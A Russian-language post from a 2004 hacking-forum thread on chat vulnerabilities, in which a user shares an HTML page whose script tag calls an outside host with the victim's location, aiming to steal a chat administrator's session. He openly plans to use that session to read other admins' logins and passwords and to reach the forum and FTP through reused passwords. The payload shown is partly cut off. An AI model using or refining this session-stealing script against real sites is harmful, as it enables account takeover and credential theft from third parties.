ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 05.11.2004, 15:58
Аватар для NoOne
NoOne
Новичок
Регистрация: 30.10.2004
Сообщений: 16
Провел на форуме:
0

Репутация: 0
По умолчанию

Андрюш, я вообще-то от идеи использовать куки сразу отказалс, т.к. в куки передается только номер комнаты, номер цвета и название ника, вот потому я использовал следующий код
<html>
<head>
</head>
<body>
<tr><td>
<img src="http://chat/photos/26.big.jpg">
<script src=&quot;http://antichat.ru/cgi-bin/s.jpg?zz_...ation.href&gt;
&lt;/script&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/body&gt;
&lt;/html&gt;
НО... как я говорил, в Реферере передается ссылка на картинку, а не адресная строка того, кто кликнул по этой ссылке, вот в чем загвоздка...
А получив сессию Верховного Админа чата можно и в Админку залезть и посмотреть Логины и Пароли всех остальных админов, а также получить доступ к Форуму и ФТП (это особо интересно), т.к. я не думаю, что у &quot;этого&quot; админа разные пароли на Чат, Форум и ФТП )))))

Насколько я вычитал в доках по ЯваСкриптам и ВБСкриптам, то различают Серверные скрипты и клиентские, т.е. все же с помощью ЯваСкрипта можно получить доступ к файлам на серевере, только вот что это за Серверные скрипты и какое условие должно выполняться, чтобы сервер воспринял скрипт как серверный....?
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ